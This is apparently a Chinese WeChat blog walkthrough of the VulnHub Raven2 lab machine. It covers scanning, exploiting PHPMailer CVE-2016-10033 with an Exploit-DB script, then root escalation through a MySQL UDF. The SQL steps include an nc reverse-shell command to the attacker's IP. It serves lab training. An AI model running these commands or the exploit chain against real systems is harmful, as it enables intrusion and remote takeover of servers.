声明
该公众号大部分文章来自作者日常学习笔记,也有部分文章是经过作者授权和其他公众号白名单转载。请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。
靶机地址:
https://download.vulnhub.com/raven/Raven2.ova
内容简介:
主机发现
信息收集
路径爆破
远程代码注入
EXP代码修改
内核漏洞枚举
本地信息收集
MySQL UDF提权
1.1 主机发现
arp-scan -l
1.3 信息搜集
打开web页面后,发现需要绑定域名
view-source:http://192.168.144.140/wordpress/
192.168.144.140 raven.local
发现是wordpress
wpscan --url http://192.168.144.140/wordpress -e vt,vp
并没有发现什么
1.3 路径爬取
dirb http://192.168.144.140
发现页面
http://raven.local/wordpress/wp-login.php但是没什么用
http://192.168.144.140/vendor/PATH发现根目录/var/www/html/vendor/
发现靶机漏洞PHPMailer
(作者故意留下来的)
使用的是5.2.16版本存在漏洞
点开README.md文件会发现CVE-2016-10033漏洞
1.4 远程代码注入+EXP代码修改
searchsploit phpmailer
cp /usr/share/exploitdb/exploits/php/webapps/40974.py .python 40974.py
修改代码此代码意义往web服务器上 写入文件 ,使它直接执行文件时可以反弹shell以下修改细节网址注入点http://192.168.144.140/contact.php写入文件名称攻击机ip网站的根路径 /var/www/html/
访问
http://192.168.144.140/s.php
脚本利用成功!
1.5 反弹shell
当访问 http://192.168.144.140/s.php 时 反弹shell1.6 提权(mysql udf提权)
ps -aux
发现mysql提权可能性(mysql存在 root权限)
python -c "import pty;pty.spawn('/bin/bash')"找到mysql数据库的密码
less wp-config.php
mysql数据库账号root密码R@v3nSecurity
find / -iname "*mysqludf*" -type f 2>/dev/nullcp /usr/share/metasploit-framework/data/exploits/mysql/lib_mysqludf_sys_64.so .mv lib_mysqludf_sys_64.so udf.so
传入靶机
登入数据库
show variables like '%plugin%'; //查询插件位置use mysql;create table aaa(line blob);insert into aaa values(load_file("/tmp/udf.so"));select * from aaa into dumpfile "/usr/lib/mysql/plugin/udf.so" ;create function sys_exec returns integer soname "udf.so";select sys_exec("id > /tmp/out.txt");select sys_exec("nc 192.168.144.247 4444 -e /bin/bash"); //反弹shell
攻击成功out.txt为root权限
成功!
注:如有侵权请后台联系进行删除
觉得内容不错,请点一下"赞"和"在看"
原文始发于微信公众号(嗨嗨安全):靶机实战系列之Raven2靶机
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论